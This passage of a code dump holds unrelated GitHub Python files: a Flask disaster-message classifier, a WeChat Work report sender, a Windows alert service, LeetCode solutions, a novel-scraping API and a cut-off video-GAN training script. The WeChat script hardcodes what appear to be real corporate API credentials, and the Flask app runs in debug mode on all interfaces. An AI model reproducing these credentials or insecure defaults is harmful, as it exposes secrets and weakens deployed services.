   lemmed = [lemmatizer.lemmatize(w) for w in words]\n    \n    return lemmed\n\n# Load Data\n#engine = create_engine('sqlite:////home/workspace/data/DisasterResponse.db')\n#engine = create_engine('sqlite:////C/1DATA/Prasanna/Udacity/dis_pipe/Workspace/data/DisasterResponse.db')\nengine = create_engine('sqlite:///../data/DisasterResponse.db')\ndf = pd.read_sql_table('Messages', engine)\n \n# load modelDisasterResponse.db\n#model = joblib.load('/home/workspace/models/classifier.pkl')\nmodel = joblib.load('../models/classifier.pkl')\n \n# index webpage displays cool visuals and receives user input text for model\n@app.route('/')\n@app.route('/index')\ndef index():\n    \n    '''prepare plotly graphs and layout to dump to json\n    for html frontend use\n    '''\n    # extract data needed for visuals\n    genre_counts = df.groupby('genre').count()['message']\n    genre_names = 
list(genre_counts.index)\n \n # Distribution of different categoies\n category = list(df.columns[4:])\n category_counts = []\n for col_name in category:\n category_counts.append(np.sum(df[col_name]))\n \n # Top words\n T_wd = pd.Series(' '.join(df['message']).lower().split())\n Top_Words = T_wd[~T_wd.isin(stopwords.words(\"english\"))].value_counts()[:10]\n T_W_Names = list(Top_Words.index) \n \n # create visuals\n graphs = [\n {\n 'data': [\n Bar(\n x=genre_names,\n y=genre_counts\n )\n ],\n\n 'layout': {\n 'title': 'Distribution of Message Genres',\n 'yaxis': {\n 'title': \"Count\"\n },\n 'xaxis': {\n 'title': \"Genre\"\n }\n }\n },\n \n {\n 'data': [\n Bar(\n x=category,\n y=category_counts\n )\n ],\n\n 'layout': {\n 'title': 'Distribution of Message Categories',\n 'yaxis': {\n 'title': \"Count\"\n },\n 'xaxis': {\n 'title': \"Category\"\n }\n }\n },\n {\n 'data': [\n Bar(\n x=T_W_Names,\n y=Top_Words\n )\n ],\n\n 'layout': {\n 'title': 'Frequent Words',\n 'yaxis': {\n 'title': \"Count\"\n },\n 'xaxis': {\n 'title': \"Words\"\n }\n }\n } \n ]\n \n # encode plotly graphs in JSON\n ids = [\"graph-{}\".format(i) for i, _ in enumerate(graphs)]\n graphJSON = json.dumps(graphs, cls=plotly.utils.PlotlyJSONEncoder)\n \n # render web page with plotly graphs\n return render_template('master.html', ids=ids, graphJSON=graphJSON)\n\n\n# web page that handles user query and displays model results\n@app.route('/go')\ndef go():\n # save user input in query\n query = request.args.get('query', '') \n\n # use model to predict classification for query\n classification_labels = model.predict([query])[0]\n classification_results = dict(zip(df.columns[4:], classification_labels))\n\n # This will render the go.html Please see that file. \n return render_template(\n 'go.html',\n query=query,\n classification_result=classification_results\n )\n\n\ndef main():\n app.run(host='0.0.0.0', port=3001, debug = True)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"prasannakr/Disaster_Response_Pipeline","sub_path":"Workspace/app/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14480582929","text":"# NODE\nimport RPi.GPIO as GPIO\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\n\nGPIO.setup(26, GPIO.IN, pull_up_down=GPIO.PUD_UP)\nGPIO.setup(19, GPIO.IN, pull_up_down=GPIO.PUD_UP)\nGPIO.setup(6, GPIO.OUT)\n\nready_for_heartbreak = False\n\ndef smile(channel):\n GPIO.output(6, GPIO.HIGH)\n print('thats the stuff')\n ready_for_heartbreak = True\n \nGPIO.add_event_detect(26, GPIO.FALLING, callback=smile, bouncetime=200)\n\nprint('my heart..')\n\nwhile(True):\n try:\n GPIO.wait_for_edge(19, GPIO.FALLING)\n GPIO.output(6, GPIO.LOW)\n except(KeyboardInterrupt):\n GPIO.cleanup()\n","repo_name":"syscnode/icebreaker","sub_path":"NODE.py","file_name":"NODE.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14711667373","text":"#! 
/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\n# @Date : 2018-07-20 17:08:55\n# @Author : Hume (102734075@qq.com)\n# @Link : https://humecry.wordpress.com/\n# @Version : 1.0\n# @Description: 生成每周日报, 发送到企业微信, 附加定时发送功能\n\nimport requests\nimport urllib\nimport time\nimport json\n# from apscheduler.schedulers.blocking import BlockingScheduler\n# 引入配置文件\nfrom conf import *\n# 引入公共函数\nfrom common import *\n# 引入自建模块\nimport jd\nimport passengerFlow\nimport unusual\n\n# 企业微信接口\nclass Wxwork:\n\t# 初始化\n\tdef __init__(self):\n\t\tself.token = self.get_token() #获取令牌\n\t\tself.chat = \"12379832426587121255\" #测试群Id\n\t# 获取token\n\tdef get_token(self):\n\t\ttoken_url = \"https://qyapi.weixin.qq.com/cgi-bin/gettoken\"\n\t\ttoken_params = {\n\t\t\t\"corpid\": \"wxcee54f67c8e413c9\",\n\t\t\t\"corpsecret\": \"HJ3PW1Yu-GTRQF6zyTSg_j4q0Ga6bQWlVq0LtUiDXkQ\"\n\t\t}\n\t\t# 读取token缓存\n\t\tf = open(\"token.txt\", \"r\")\n\t\ttoken_cache = f.read()\n\t\tf.close()\n\t\ttoken_cache = eval(token_cache)\n\t\t# 判断token缓存是否过期\n\t\tif time.time() < token_cache[\"expires\"]:\n\t\t\tself.token = token_cache[\"access_token\"]\n\t\telse:\n\t\t\t# 获取token\n\t\t\tself.token = requests.get(token_url, token_params).json()\n\t\t\tself.token[\"expires\"] = time.time() + self.token[\"expires_in\"]\n\t\t\tf = open(\"token.txt\", \"w\")\n\t\t\tf.write(str(self.token))\n\t\t\tf.close()\n\t\t\tself.token = self.token[\"access_token\"]\n\t\treturn self.token\n\t# 获取应用信息\n\tdef get_app_info(self):\n\t\turl = \"https://qyapi.weixin.qq.com/cgi-bin/agent/get\"\n\t\tparams = {\n\t\t\t\"access_token\": self.token,\n\t\t\t\"agentid\": \"1000003\" #应用ID\n\t\t}\n\t\tself.app = requests.get(url, params).json()\n\t\treturn self.app\n\t# 获取标签ID\n\tdef get_tags(self):\n\t\turl = \"https://qyapi.weixin.qq.com/cgi-bin/tag/list\"\n\t\tparams = {\n\t\t\t\"access_token\": self.token,\n\t\t}\n\t\tself.tags = requests.get(url, params).json()\n\t\treturn self.tags\n\t# 获取成员信息\n\tdef get_user_info(self, id):\n\t\turl = \"https://qyapi.weixin.qq.com/cgi-bin/user/get\"\n\t\tparams = {\n\t\t\t\"access_token\": self.token,\n\t\t\t\"userid\": id\n\t\t}\n\t\tself.users = requests.get(url, params).json()\n\t\treturn self.users\n\t# 发送文本消息\n\tdef send_text(self, message, tagId=4, userId=None):\n\t\turl = \"https://qyapi.weixin.qq.com/cgi-bin/message/send\"\n\t\tparams = {\n\t\t\t\"access_token\": self.token,\n\t\t}\n\t\tjsonData = {\n\t\t \"touser\" : userId, #用户ID\n\t\t \"toparty\" : \"\", #部门ID\n\t\t \"totag\" : tagId,\n\t\t \"msgtype\" : \"text\",\n\t\t \"agentid\" : 1000003, #应用ID\n\t\t \"text\" : {\n\t\t\t \"content\" : message\n\t\t },\n\t\t \"safe\":0\n\t\t}\n\t\tresponse = requests.post(url, params=params, json=jsonData).json()\n\t\treturn response\n\t# 上传临时素材,素材上传得到media_id,该media_id仅三天内有效\n\tdef upload_file(self, fileName):\n\t\ttry:\n\t\t\turl = \"https://qyapi.weixin.qq.com/cgi-bin/media/upload\"\n\t\t\tparams = {\n\t\t\t\t\"access_token\": self.token,\n\t\t\t\t\"type\": \"file\"\n\t\t\t}\n\t\t\t# requests库不支持上传以中文文件名的文件\n\t\t\tfiles = {'file': open(fileName.encode('utf-8'), 'rb')}\n\t\t\tresponse = requests.post(url, params=params, files=files).json()\n\t\t\tself.media = response[\"media_id\"]\n\t\texcept:\n\t\t\tprint(\"requests不支持中文名文件上传,需要对requests原库进行更改。具体参考:https://www.zhihu.com/question/49583910\")\n\t\tfinally:\n\t\t\treturn response\n\t# 发送附件\n\tdef send_file(self, fileName, userId=None, partyId=None, tagId=\"4\"):\n\t\t# 上传临时素材\n\t\tresponseUpload = self.upload_file(fileName)\n\t\turl = 
\"https://qyapi.weixin.qq.com/cgi-bin/message/send\"\n\t\tparams = {\n\t\t\t\"access_token\": self.token,\n\t\t}\n\t\tjsonData = {\n\t\t \"touser\" : userId,\n\t\t \"toparty\" : partyId,\n\t\t \"totag\" : tagId,\n\t\t \"msgtype\" : \"file\",\n\t\t \"agentid\" : 1000003, #应用ID\n\t\t \"file\" : {\n\t\t\t\t\"media_id\" : self.media\n\t\t },\n\t\t \"safe\":0\n\t\t}\n\t\tresponseSend = requests.post(url, params=params, json=jsonData).json()\n\t\treturn responseUpload, responseSend\n\t# 创建群聊会话\n\tdef creat_group(self, userList, owner=\"2913\", name=None, chatId=None):\n\t\turl = \"https://qyapi.weixin.qq.com/cgi-bin/appchat/create\"\n\t\tparams = {\n\t\t\t\"access_token\": self.token,\n\t\t}\n\t\tjsonData = {\n\t\t\t\"name\" : name,\n\t\t\t\"owner\" : owner,\n\t\t\t\"userlist\" : userList,\n\t\t\t\"chatid\" : chatId\n\t\t}\n\t\tresponse = requests.post(url, params=params, json=jsonData).json()\n\t\tself.chat = response[\"chatid\"]\n\t\treturn response\n\t# 获取群聊信息\n\tdef get_group_info(self):\n\t\turl = \"https://qyapi.weixin.qq.com/cgi-bin/appchat/get\"\n\t\tparams = {\n\t\t\t\"access_token\": self.token,\n\t\t\t\"chatid\": self.chat\n\t\t}\n\t\tresponse = requests.get(url, params=params).json()\n\t\treturn response\n\t# 向群聊发送文本消息\n\tdef send_text2chat(self, message):\n\t\turl = \"https://qyapi.weixin.qq.com/cgi-bin/appchat/send\"\n\t\tparams = {\n\t\t\t\"access_token\": self.token,\n\t\t}\n\t\tjsonData = {\n\t\t\t\"chatid\": self.chat,\n\t\t\t\"msgtype\":\"text\",\n\t\t\t\"text\":{\n\t\t\t\t\"content\" : message\n\t\t\t},\n\t\t\t\"safe\":0\n\t\t}\n\t\tresponse = requests.post(url, params=params, json=jsonData).json()\n\t\treturn response\n\t# 向群���发送附件\n\tdef send_file2chat(self, fileName):\n\t\ttry:\n\t\t\t# 上传临时素材\n\t\t\tresponseUpload = self.upload_file(fileName)\n\t\t\turl = \"https://qyapi.weixin.qq.com/cgi-bin/appchat/send\"\n\t\t\tparams = {\n\t\t\t\t\"access_token\": self.token,\n\t\t\t}\n\t\t\tjsonData = {\n\t\t\t \"chatid\" : self.chat,\n\t\t\t \"msgtype\" : \"file\",\n\t\t\t \"file\" : {\n\t\t\t\t\t\"media_id\" : self.media\n\t\t\t },\n\t\t\t \"safe\":0\n\t\t\t}\n\t\t\tresponseSend = requests.post(url, params=params, json=jsonData).json()\n\t\t\tif responseSend['errcode'] == 0:\n\t\t\t\tprint(fileName + \"发送成功OK!✔️\")\n\t\texcept:\n\t\t\tprint(\"发送附件失败!\")\n\t\tfinally:\t\n\t\t\treturn responseUpload, responseSend\n\tdef send_excel2chat(self, type):\n\t\t# 上周京东美团\n\t\tif type == 'jd':\n\t\t\tself.send_file2chat(jd.main())\n\t\t# 上周客流\n\t\telif type == 'passengerFlowLastWeek':\n\t\t\tself.send_file2chat(passengerFlow.main('lastweek'))\n\t\t# 上周异常\n\t\telif type == 'unusual':\n\t\t\tfor fileName in unusual.main():\n\t\t\t\tself.send_file2chat(fileName)\n\t\telif type == 'passengerFlowLastMonth':\n\t\t\tself.send_file2chat(passengerFlow.main('lastmonth'))\n\t\telse:\n\t\t\tprint('send_excel2chat报错:非法参数!')\n\t\tprint('----------------------------------------------------------------')\n\n# 将字典格式化为json字符串\ndef echo(dic):\n\tjsonString = json.dumps(dic, ensure_ascii=False, indent=4)\n\tprint(jsonString)\n\treturn jsonString\n\n# 在本地生成所有统计文件\ndef createFile():\n\tarw = arrow.now()\n\t# 进度条\n\tmax_steps = len(JDshops) * 2 + arw.shift(months=-1).ceil('month').day * 2 + len(DIC) + 7*2 + len(DIC) + 4\n\tprocess_bar = ShowProcess(max_steps, '恭喜, 成功导出数据!')\n\n\t# 上周京东美团\n\tjd.main(process_bar)\n\t# 上周客流\n\tpassengerFlow.main('lastweek', process_bar)\n\t# 上周异常\n\tunusual.main(process_bar)\n\t# 上月客流\n\tpassengerFlow.main('lastmonth', process_bar)\n\n# 设置时间自动发送文件到群里\ndef setTime2Do():\n\t# 
设定时间\n\tmonday = {\n\t\t'day_of_week': '2', # 0-6为周一到周日\n\t\t'hour': 10,\n\t\t'minute': 29\n\t}\n\tfirstDay = {\n\t\t'day': '25', # 几号\n\t\t'hour': 10,\n\t\t'minute': 29\n\t}\n\tscheduler = BlockingScheduler()\n\t\n\twx = Wxwork()\n\t# 上周京东美团\n\tscheduler.add_job(wx.send_excel2chat, 'cron', ['jd'], **monday)\n\t# 上周客流\n\tscheduler.add_job(wx.send_excel2chat, 'cron', ['passengerFlowLastWeek'], **monday)\n\t# 上周异常\n\tscheduler.add_job(wx.send_excel2chat, 'cron', ['unusual'], **monday)\n\t# 上月客流\n\tscheduler.add_job(wx.send_excel2chat, 'cron', ['passengerFlowLastMonth'], **firstDay)\n\tscheduler.start()\n\nif __name__ == '__main__':\n\t# 定时执行\n\t# setTime2Do()\n\t\n\t# 手动执行\n\t# 仅生成文件\n\tcreateFile()\n\t# 生成并发送文件\n\t# wx = Wxwork()\n\t# wx.send_excel2chat('jd')\n\t# wx.send_excel2chat('passengerFlowLastWeek')\n\t# wx.send_excel2chat('unusual')\n\t# wx.send_excel2chat('passengerFlowLastMonth')\n\ttime.sleep(30)","repo_name":"Humecry/Weekly","sub_path":"report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":7789,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"70515358187","text":"def twoSum(nums, target):\n if nums == None:\n return [0,0]\n required = {}\n for i in range(len(nums)):\n if target - nums[i] in required:\n return [required[target - nums[i]],i]\n else:\n required[nums[i]] = i\n\nn = int(input())\ninput_list = []\n\nfor i in range(n):\n input_list.append(int(input()))\n\ntarget = int(input())\n\nprint(twoSum(input_list, target))","repo_name":"kfahad5607/PlacePrep","sub_path":"onlineJudge/questions/two-sum/python/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71610508268","text":"import win32serviceutil\nimport win32service\nimport win32event\nimport servicemanager\nimport win32ts\nimport win32profile\nimport win32process\nimport win32con\n\nimport socket\nimport requests\nimport time\nimport sys\n\n\nclass ExampleService(win32serviceutil.ServiceFramework):\n _svc_name_ = \"AlertService\"\n _svc_display_name_ = \"Alert Service\"\n _svc_description_ = \"Description\"\n\n def __init__(self, args):\n win32serviceutil.ServiceFramework.__init__(self, args)\n self.hWaitStop = win32event.CreateEvent(None, 0, 0, None)\n socket.setdefaulttimeout(60)\n\n def SvcDoRun(self):\n servicemanager.LogMsg(servicemanager.EVENTLOG_INFORMATION_TYPE,\n servicemanager.PYS_SERVICE_STARTED,\n (self._svc_name_, ''))\n self.main()\n\n def SvcStop(self):\n self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)\n win32event.SetEvent(self.hWaitStop)\n\n def main(self):\n with open(\"C:\\\\Users\\\\Default\\\\AppData\\\\Roaming\\\\CorporationChat\\\\path.txt\", \"r\") as file:\n appdata_path = file.read()\n console_session_id = win32ts.WTSGetActiveConsoleSessionId()\n console_user_token = win32ts.WTSQueryUserToken(console_session_id)\n environment = win32profile.CreateEnvironmentBlock(console_user_token, False)\n startupInfo = win32process.STARTUPINFO()\n startupInfo.dwFlags = win32process.STARTF_USESHOWWINDOW\n startupInfo.wShowWindow = win32con.SW_NORMAL\n\n while True:\n try:\n with open(appdata_path + \"\\\\alert\\\\groups.json\", \"r\") as file:\n groups = file.read()\n if len(groups) == 0:\n time.sleep(30)\n result = requests.get(f\"https://chat-b4ckend.herokuapp.com/alert/?groups={groups}\")\n if result.status_code == 200:\n with open(\"C:\\\\Users\\\\dakfa\\\\Desktop\\\\test.txt\", 
\"a\") as file:\n file.write(str(result.json()) + \"\\n\")\n if result.json():\n win32process.CreateProcessAsUser(console_user_token,\n appdata_path + \"\\\\alert\\\\alert.exe\",\n None, None, None, 0, win32con.NORMAL_PRIORITY_CLASS,\n environment, None, startupInfo)\n time.sleep(15)\n time.sleep(7)\n except Exception as e:\n with open(\"C:\\\\Users\\\\dakfa\\\\Desktop\\\\errors.txt\", \"a\") as file:\n file.write(str(e))\n\n\nif __name__ == '__main__':\n if len(sys.argv) == 1:\n servicemanager.Initialize()\n servicemanager.PrepareToHostSingle(ExampleService)\n servicemanager.StartServiceCtrlDispatcher()\n else:\n # pyinstaller --hiddenimport win32timezone AlertService.py\n # sc queryex AlertService\n # taskkill /PID 1084 /F\n win32serviceutil.HandleCommandLine(ExampleService)\n","repo_name":"Delivery-Klad/chat_service","sub_path":"AlertService.py","file_name":"AlertService.py","file_ext":"py","file_size_in_byte":3068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22525797197","text":"import heapq\n\nclass Solution:\n \"\"\" \n With heapify:\n n ~ len(s)\n time complexity: O(n) because the freqMap for loop, heapify, and while loop all take O(n)\n space complexity: O(n), freqMap, heap all take O(n)\n With heappush:\n time complexity: O(n) because the O(nlogn) time complexity of heapush is overpowered by for and while loop\n The O(logn) time of heappop is also overpowered by for and while loop.\n space complexity: O(n)\n \"\"\"\n def frequencySort(self, s: str) -> str:\n freqMap = {}\n\n # get freq count\n for i,c in enumerate(s):\n if c in freqMap.keys():\n freqMap[c] += 1\n else:\n freqMap[c] = 1\n\n # freq is made negative to make max heap\n #tupList = [(-freq, ch) for ch, freq in freqMap.items()]\n #heapq.heapify(tupList) # O(n) time complexity\n \n tupList = []\n for ch in freqMap:\n freq = freqMap[ch]\n heapq.heappush(tupList, (-freq, ch)) #O(nlogn) time complexity\n\n # rebuild string\n sOut = \"\"\n while len(tupList) > 0: # O(n) time\n tup = heapq.heappop(tupList) #O(logn) time \n freq, ch = tup[0], tup[1]\n sOut += ch*(-freq)\n \n return sOut\n\nclass Solution2:\n def frequencySort(self, s: str) -> str:\n freqMap = {}\n\n # get freq count\n for i,c in enumerate(s):\n if c in freqMap.keys():\n freqMap[c] += 1\n else:\n freqMap[c] = 1\n \n # print(\"freqMap: \", freqMap)\n\n tupList = [(v,k) for k,v in freqMap.items()]\n # print(\"tupList: \", tupList)\n\n tupList = sorted(tupList, key = lambda x: x[0])\n # print(\"tupList after sort: \", tupList)\n\n # rebuild string\n sOut = \"\"\n for i in range(len(tupList)-1, -1, -1):\n tup = tupList[i]\n f, c = tup[0], tup[1]\n sOut += c*f\n \n return sOut","repo_name":"mcxu/code-sandbox","sub_path":"PythonSandbox/src/leetcode/lc451_sort_chars_by_freq.py","file_name":"lc451_sort_chars_by_freq.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"42140244397","text":"import sys\ninput = sys.stdin.readline\n\nN = int(input())\nnumbers = list(map(int, input().split()))\n# 직전 숫자가 포함된 결과, 직전 숫자를 포함하지 않는 결과\ndp = [0] * N\ndp[0] = numbers[0]\nret = numbers[0]\n\nfor n in range(1, N):\n dp[n] = max(numbers[n], dp[n - 1] + numbers[n])\n \n if dp[n] > ret:\n ret = 
dp[n]\n\nprint(ret)","repo_name":"W1nU/algorithm","sub_path":"first/1912.py","file_name":"1912.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22572638165","text":"from typing import List\n\n\nclass Solution:\n    def simplifiedFractions(self, n: int) -> List[str]:\n        i = 1\n        res, seen = [], set()\n        while i < n:\n            for j in range(i + 1, n + 1):\n                if i != j and i / j not in seen:\n                    res.append(str(i) + \"/\" + str(j))\n                    seen.add(i / j)\n            i += 1\n        return res\n","repo_name":"sanial2001/DP","sub_path":"simplified fraction.py","file_name":"simplified fraction.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21762679164","text":"\nimport boto3\nimport os\nimport json\nfrom datetime import datetime\n\n\ndef create_event(event_source, event_name, event_json, s3_bucket):\n\ttimestamp = datetime.now().isoformat()\n\tevent_json[\"eventProcessingTimestamp\"] = timestamp\n\tevent_desc = f\"{event_source}__{event_name}.json\"\n\tif \"simple_description\" in event_json:\n\t\tevent_desc = event_json[\"simple_description\"].replace(\" \", \"__\") + \".json\"\n\n\tlast_occurrence_key = f\"events/last-occurrence/{event_desc}\"\n\tescaped_time = timestamp[11:23].replace(\":\", \"-\")\n\thistory_key = f\"events/history/{timestamp[0:4]}/{timestamp[5:7]}/{timestamp[8:10]}/{escaped_time}_{event_desc}\"\n\n\ts3 = boto3.client(\"s3\")\n\ts3.put_object(Bucket=s3_bucket, Key=last_occurrence_key, Body=json.dumps(event_json, indent=3))\n\ts3.put_object(Bucket=s3_bucket, Key=history_key, Body=json.dumps(event_json, indent=3))\n\n\tresults = {\"last_occurrence_key\" : last_occurrence_key, \"history_key\" : history_key}\n\treturn results\n\n\n\t\n","repo_name":"stevezieglerva/python-linting-formatting-test","sub_path":"input/process_alarms/EventInfo.py","file_name":"EventInfo.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2695703683","text":"import threading\n\nclass testImageThread(threading.Thread): \n    def __init__(self, threadID, name, imageArray, limits, featureList, window, slide):\n        threading.Thread.__init__(self)\n        self.threadID = threadID\n        self.name = name\n        self.imgArr = imageArray\n        self.limits = limits\n        self.featureList = featureList\n        self.window = window\n        self.slide = slide\n        # calculateFeatures is assumed to be provided elsewhere in the project\n        self.cf = calculateFeatures(featureList)\n        self.result = []\n    \n    def run(self):\n        self.walkImage()\n    \n    def walkImage(self):\n        '''\n        input: input image, window size in pixels, slide in pixels\n        output: saves calculated features to instance variable \"result\"\n        '''\n        for startX in range(self.imgArr.shape[0]):\n            endX = startX + self.window\n            for startY in range(self.imgArr.shape[1]):\n                endY = startY + self.window\n                subImage = self.imgArr[startX:endX, startY:endY, :]\n                self.result.append(self.cf.getFeatures(subImage))","repo_name":"aplassard/Image_Processing","sub_path":"myThread.py","file_name":"myThread.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"33391597587","text":"\"\"\"\n    Created by Amirk on 2018-07-26.\n\"\"\"\nfrom flask import Blueprint, request\nfrom app.libs.error_code import Success, NotFound\nfrom app.libs.token_auth import auth\nfrom app.model.book_chapter import BookChapter\nfrom app.model.book_novel_info 
import BookInfo\nfrom app.plugin.novel_spider import Spider\nfrom app.vaildators.forms import ContentTextForm, BookByCategorieForm\n\napi = Blueprint('book', __name__)\n\n\n@api.route('/v1/book/search')\ndef search():\n    \"\"\"Search for books\"\"\"\n    form = ContentTextForm(request.args)\n    if form.validate():\n        query = form.data.get('query')\n        bookinfo = BookInfo.check_to_book(title=query)\n        if bookinfo:\n            data = bookinfo\n        else:\n            spider = Spider(query=query)\n            data = spider.search_query()\n        print(data)\n        return Success(data=data)\n    return NotFound()\n\n\n@api.route('/v1/book/bookinfo/<int:id>')\ndef bookinfo(id):\n    \"\"\"Book detail info\"\"\"\n    bookinfo = BookInfo.check_to_book(id=id)\n    if bookinfo and bookinfo.get('longIntro') is not None:\n        datas = bookinfo\n    else:\n        spider = Spider(id)\n        datas = spider.bookinfo_spider()\n    return Success(data=datas)\n\n\n@api.route('/v1/book/<int:id>/recommend')\ndef book_recommend(id):\n    \"\"\"Recommended novels\"\"\"\n    spider = Spider(id=id)\n    data = spider.book_recommend_spider()\n    return Success(data=data)\n\n\n@api.route('/v1/book/accurate')\ndef accurate_author():\n    \"\"\"Exact author search\"\"\"\n    author = request.args.get('author')\n    book_author = BookInfo.check_to_book(author=author)\n    if book_author:\n        data = book_author\n    else:\n        spider = Spider(author=author)\n        data = spider.book_author_spider()\n    return Success(data=data)\n\n\n@api.route('/v1/book/chapter/<int:id>')\ndef book_chapter_list(id):\n    \"\"\"Book table of contents\"\"\"\n    books = BookChapter.check_to_book_chapter(id)\n    if books:\n        data = books\n    else:\n        spider = Spider(id=id)\n        data = spider.book_chapter_spider()\n    return Success(data=data)\n\n\n@api.route('/v1/book/chapter/parse')\n@auth.login_required\ndef book_chpater_text():\n    \"\"\"Chapter content\"\"\"\n    form = ContentTextForm(request.args)\n    if form.validate():\n        query = form.data.get('query')\n        books = BookChapter.check_to_book_text(query)\n        if books:\n            content_text = books\n        else:\n            spider = Spider()\n            content_text = spider.book_chapter_text_spider(query)\n        content_text['chapterText'] = [temp for temp in content_text.get('chapterText').split('\\n')]\n        content__on_down = BookChapter.check_to_text_on_or_down(query)  # the next chapter to return\n        data = {\n            \"content_text\": content_text,\n            \"content__on_down\": content__on_down\n        }\n        return Success(data=data)\n    return NotFound()\n\n\n@api.route('/v1/book/search_sub')\ndef search_sup_query():\n    \"\"\"Search auto-completion\"\"\"\n    form = ContentTextForm(request.args)\n    if form.validate():\n        query = form.data.get('query')\n        spider = Spider()\n        data = spider.book_search_sub_query(query)\n        return Success(data=data)\n\n\n@api.route('/v1/book/hot_words')\ndef hot_words():\n    \"\"\"Hot search words\"\"\"\n    spider = Spider()\n    data = spider.book_search_hot_words()\n    return Success(data=data)\n\n\n@api.route('/v1/book/statistics')\ndef book_statistics():\n    \"\"\"Get all categories\"\"\"\n    spider = Spider()\n    data = spider.book_statistics_type()\n    return Success(data=data)\n\n@api.route('/v1/book/by-categories')\ndef book_by_categories():\n    \"\"\"\n    Get the novel list by category\n    \"\"\"\n    spider = Spider()\n    form = BookByCategorieForm(request.args)\n    if form.validate():\n        data = spider.book_by_categories_spider(form.data)\n        return Success(data=data)\n    else:\n        return NotFound()","repo_name":"wanws/BookApplet","sub_path":"books/books/server/novel/app/api/v1/book.py","file_name":"book.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1082768921","text":"import os\nimport time\nimport copy\nimport json\nimport pickle\nimport psutil\nimport PIL.Image\nimport 
numpy as np\nimport random\nimport torch\nimport dnnlib\nfrom torch_utils import misc\nfrom torch_utils import training_stats\nfrom torch_utils.ops import conv2d_gradfix\nfrom torch_utils.ops import grid_sample_gradfix\nimport torchvision\n\nimport legacy\nfrom metrics_styleinv import metric_main\nfrom einops import rearrange\n#----------------------------------------------------------------------------\n\ndef setup_snapshot_image_grid(training_set, random_seed=0):\n rnd = np.random.RandomState(random_seed)\n gw, gh = 5, 5\n\n # No labels => show random subset of training samples.\n training_set.return_one = True\n all_indices = list(range(training_set.total_frames))\n rnd.shuffle(all_indices)\n grid_indices = [all_indices[i % len(all_indices)] for i in range(gw * gh)]\n\n # Load data.\n images = [training_set[i].copy() for i in grid_indices]\n training_set.return_one = False\n return (gw, gh), np.stack(images)\n\ndef convert_batch_videos_to_grid(batch_videos, grid_size): # (b,c,t,h,w) -> (t, H, W, c)\n gw, gh = grid_size\n _N, C, T, H, W = batch_videos.shape\n videos = batch_videos.reshape(gh, gw, C, T, H, W)\n videos = videos.permute(3, 0, 4, 1, 5, 2)\n videos = videos.reshape(T, gh*H, gw*W, C)\n return videos\n\ndef setup_snapshot_video_grid(training_set_kwargs, grid_size=(5,5), random_seed=0):\n gw, gh = grid_size\n rnd = np.random.RandomState(random_seed)\n svdata_kwargs = copy.deepcopy(training_set_kwargs)\n svdata_kwargs.return_vid = True\n svdata = dnnlib.util.construct_class_by_name(**svdata_kwargs)\n all_indices = list(range(svdata.n_videos))\n rnd.shuffle(all_indices)\n grid_indices = [all_indices[i % len(all_indices)] for i in range(gw * gh)]\n\n # Load data.\n videos = torch.cat([torch.from_numpy(svdata[i]).unsqueeze(0) for i in grid_indices]) # (b, c, t, h, w)\n del svdata\n return convert_batch_videos_to_grid(videos, grid_size)\n#----------------------------------------------------------------------------\n\ndef save_image_grid(img, fname, drange, grid_size):\n lo, hi = drange\n img = np.asarray(img, dtype=np.float32)\n img = (img - lo) * (255 / (hi - lo))\n img = np.rint(img).clip(0, 255).astype(np.uint8)\n\n gw, gh = grid_size\n _N, C, H, W = img.shape\n img = img.reshape(gh, gw, C, H, W)\n img = img.transpose(0, 3, 1, 4, 2)\n img = img.reshape(gh * H, gw * W, C)\n\n assert C in [1, 3]\n if C == 1:\n PIL.Image.fromarray(img[:, :, 0], 'L').save(fname)\n if C == 3:\n PIL.Image.fromarray(img, 'RGB').save(fname)\n\n#----------------------------------------------------------------------------\n\ndef generate_visualize_videos(SI, G_synthesis, grid_batch=1, grid_x=None, grid_wc=None, grid_zm=None, grid_Ts=None, grid_num_ws=14, noise_mode='none'):\n grid_videos, grid_image = [], []\n for grid_idx in range(grid_batch):\n grid_styles = SI(\n grid_x[grid_idx : grid_idx + 1],\n grid_wc[grid_idx : grid_idx + 1],\n grid_zm[grid_idx : grid_idx + 1] if grid_zm is not None else None,\n grid_Ts,\n run_parallel=True,\n return_temporal_style=False\n )\n grid_styles_b = grid_styles.unsqueeze(1).repeat([1, grid_num_ws, 1])\n grid_vid = G_synthesis(grid_styles_b, noise_mode=noise_mode).cpu() # (t, c, h, w)\n grid_image.append(grid_x[grid_idx:grid_idx+1].cpu())\n grid_image.append(grid_vid[0:1])\n grid_videos.append(grid_vid.unsqueeze(0))\n \n grid_images = torch.cat(grid_image).numpy() # (b*2, c, h, w)\n grid_videos = torch.cat(grid_videos) # (b, t, c, h, w)\n assert grid_videos.ndim == 5\n grid_videos = 